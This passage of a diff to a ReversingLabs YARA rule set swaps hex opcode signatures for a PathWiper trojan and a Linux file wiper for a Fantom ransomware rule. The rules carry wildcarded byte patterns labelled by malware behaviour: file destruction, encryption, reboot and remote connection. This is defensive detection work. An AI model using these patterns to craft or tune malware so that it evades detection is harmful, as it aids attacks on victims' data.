-            ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C
-            24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45
-            ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ??
-            8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C
-            24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7
-            45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24
-            ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24
-            E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33
+            C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ??
+            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84
+            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
+            74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9
         }
-		$destroy_files_using_overwrite = {
-            55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75
-            ?? 8B 7D ?? 89 EC 5D C3
+		$encrypt_files = {
+            53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89
+            C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89
+            43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74
+            ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B
+            ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B 03 8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3
         }
-		$redundant_reboot_attempts = {
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? C3
+		$remote_connection_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
+            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8
+        }
+		$remote_connection_p2 = {
+            50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45
+            ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ??
+            ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $destroy_files_using_ioctls ) and ( $destroy_files_using_overwrite ) and ( $redundant_reboot_attempts )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Pathwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects PathWiper trojan."
+		description = "Yara rule that detects Fantom ransomware."
 		author = "ReversingLabs"
-		id = "8d6b0443-405c-55c1-8f19-0a60cc3f6f43"
-		date = "2025-08-26"
-		modified = "2025-08-26"
+		id = "cd32de8b-2c14-5fb4-be79-365d9848f341"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.PathWiper.yara#L1-L280"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d439cb7c369405f3938d856e1ad92b47889d0f0cad45f718a8d0c86dd7f5a461"
+		logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "PathWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Fantom"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$find_volumes_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 7D ?? 33 F6 89 BD ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 89 75 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 37
-            89 77 ?? 89 77 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B
-            CA 49 80 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 80 BD ?? ?? ?? ?? ?? 0F
-            85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 80 BC 0D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 83 ?? ?? ??
-            ?? C6 84 0D ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B
-            CA 8D 85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 B5 ?? ??
-            ?? ?? 74 ?? 0F 10 85 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? C7 46 ?? ?? ??
-            ?? ?? 0F 11 06 C6 85 ?? ?? ?? ?? ?? F3 0F 7E 85 ?? ?? ?? ?? 66 0F D6 46 ?? 83 C6
-        }
-		$find_volumes_p2 = {
-            89 B5 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 50
-            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01
-            41 84 C0 75 ?? 2B CA 49 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 07 8B 85 ?? ?? ?? ?? 89 77 ?? 89 47 ?? 8D 8D ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 89 B5 ?? ?? ?? ??
-            50 8D 8D ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 83 FA ?? 8B 8D ?? ?? ?? ?? 0F 43 C7 C6 45 ?? ?? 80 7C 01 ?? ?? 75 ??
-            49 8D 85 ?? ?? ?? ?? 83 FA ?? 89 8D ?? ?? ?? ?? 0F 43 C7 C6 04 08 ?? 6A ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 89 08 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 C9
-            0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 33 C0 03 D1 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 09
-            85 C9 74 ?? 8B 01 4A 85 C0 74 ?? 8B 00 85 C0 74 ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33
-            C0 8B 48 ?? 8B 40 ?? 49 23 CA C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 04 88 89
-            85 ?? ?? ?? ?? 83 78 ?? ?? 8B 78 ?? 89 BD ?? ?? ?? ?? 72 ?? 8B 00 89 85 ?? ?? ?? ??
-            83 FF ?? 73 ?? 0F 10 00 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 11 45 ?? 8B 7D ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C7 B9 ?? ?? ?? ?? 83 C8 ?? 3D ?? ?? ?? ?? 0F
-            47 C1 89 85 ?? ?? ?? ?? 8D 48 ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 3B C1 B9 ?? ?? ??
-            ?? 0F 46 C1 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 78 ?? 83 E7 ?? 89
-        }
-		$find_files_p2 = {
-            47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 85 ?? ?? ??
-            ?? 40 89 7D ?? 50 FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 4D ?? 83 C0 ?? C6 45 ?? ?? 83 CE ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 45 ?? 8B 8D ??
-            ?? ?? ?? 51 0F 43 C7 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
-            8B 55 ?? 83 E6 ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81
-            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            80 BD ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 75 ?? 8A 85 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ??
-            ?? 3C ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            74 ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 50 ?? C6 85 ?? ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 8D ?? ?? ??
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 CE ?? C6 45 ?? ?? 89 B5 ?? ?? ?? ?? 8D
-        }
-		$find_files_p3 = {
-            4D ?? 8B 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 46 ?? 50 E8
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 56 0F 43 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B C7 8B 4D ?? 2B C1 8B 55 ?? 8B 75 ?? 3B D0 76 ?? 8B
-            C6 2B C2 3B C1 72 ?? 83 FF ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 50 6A ?? E8
-            ?? ?? ?? ?? EB ?? 83 FE ?? 8D 85 ?? ?? ?? ?? 52 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 50 E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E
-            40 ?? 66 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8B B5 ?? ??
-            ?? ?? 83 E6 ?? 83 CE ?? 8B 55 ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 55
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
-            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
-            ?? F6 85 ?? ?? ?? ?? ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D
-            95 ?? ?? ?? ?? 52 8D 55 ?? 52 8B 40 ?? FF D0 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 42 ?? 3B C8 77 ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 49
-        }
-		$find_files_p4 = {
-            23 C1 89 85 ?? ?? ?? ?? 03 C2 23 C1 8B 8D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 83 3C 0F
-            ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 04 0F 8B 8D ?? ?? ?? ??
-            8B 0C 0F 8D 45 ?? 50 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 85
-            C9 0F 84 ?? ?? ?? ?? 8B 01 8D 95 ?? ?? ?? ?? 52 8D 55 ?? 52 FF 50 ?? 8B 55 ?? C6 45
-            ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B
-            C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ??
-            ?? ?? 8B 55 ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 8D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
-            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85
-            C9 74 ?? 8B 11 8D 45 ?? 3B C8 0F 95 C0 0F B6 C0 50 FF 52 ?? 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_shared_network_drives_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 7D ?? 89 BD ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? C7
-            47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? B1 ?? 88 45 ?? 0F 57 C0 8A 45 ?? BE ?? ?? ?? ?? 32
-            C1 C7 45 ?? ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 E6
-            6A ?? 68 ?? ?? ?? ?? 52 50 C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 32 85
-            ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ??
-            8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8
-            ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ??
-            ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A
-        }
-		$find_shared_network_drives_p2 = {
